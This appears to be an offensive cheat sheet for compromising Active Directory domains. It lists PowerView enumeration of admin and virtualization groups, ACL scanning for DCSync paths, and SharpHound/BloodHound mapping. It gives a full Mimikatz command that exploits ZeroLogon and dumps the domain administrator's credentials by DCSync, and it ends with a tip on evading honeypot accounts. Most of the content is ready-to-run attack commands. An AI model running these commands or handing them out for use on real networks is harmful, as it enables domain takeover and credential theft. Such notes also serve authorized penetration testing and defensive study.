To Identify which AD Groups have Admin rights to which computers :
Get-NetGPOGroup
Get-NetGPOGroup -GroupName "Local Admin"
Virtual Admins (VMware Admins and HyperV admins) they are often groupos in AD ahving full admin access. So sometimes we can own the whole system.
Get-NetGroup "*Hyper*" | Get-NetGroupMember
Get-NetGroup "*VMWare*" | Get-NetGroupMember
Look for misconfigured ACLs and permissions on a user which can possibly allow you to do attacks like DCSync.
Use Sharphound on all machines to ennumerate data to basically ennumerate and visualize it in Bloodhound, make sure you also mark all the users owned that you have compromised.
See if the System is vulnerable to ZeroLogon and sometimes do remember that with certain policies in place its hard to execute the gathering of hashes as the system might have scripts or something that revert back the password of the machine.
mimikatz "lsadump::Zerologon /target:DCName /account:DCName$ /null /ntlm /exploit" "lsadump::dcsync /domain:Domain.local /dc:DCName /user:administrator /authuser:DCName$ /authdomain:Domain /authpassword: /authntlm" "exit"
or you can use Impacket to exploit it
Custom Domain/OU Delegations :
Check for misconfigurations in the ACL's and see if computers have misconfigured ACL rights. We can use PowerView for it.
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
Invoke-ACLScanner # For all
# For Current User
Invoke-ACLScanner | Where-Object {$_.IdentityReference –eq [System.Security.Principal.WindowsIdentity]::GetCurrent().Name}
To avoid decoys and honeypots a good idea is to check the logon counts on the machines and if there are any stale accounts try to avoid them as they can be traps